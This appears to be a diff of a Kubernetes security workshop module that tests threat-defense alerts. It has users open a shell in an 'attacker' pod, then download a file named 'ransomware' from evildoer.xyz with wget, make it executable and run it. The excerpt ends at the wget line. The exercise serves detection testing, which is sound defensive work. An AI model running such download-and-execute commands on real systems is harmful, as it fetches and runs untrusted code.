tigera-solutions/cc-eks-visualize-identify-security-gaps/mod/module-3-threat-defense.md

 - Understand the scope and frequency of the issue
 - Manage alert noise by dismissing events (show/hide)

-To test this feature, let's download a file that contains the hash of a malware and execute it inside the pod attacker.
+To test this feature, we can download a file containing the hash of malware and execute it inside the pod attacker.

-1. Execute the bash inside the pod attack in way you can interact with its shell prompt:
+1. Execute the bash inside the pod attack in the way you can interact with its shell prompt:

    ```bash
    kubectl exec attacker -it -- /bin/bash
    ```

-2. From the bash inside the pod attacker execute the following command to: 1) Download the malware, change its permission and run it.
+2. From the bash inside the pod `attacker`, execute the following command to download the malware, change its permission and run it.

    ```bash
    wget http://evildoer.xyz/ransomware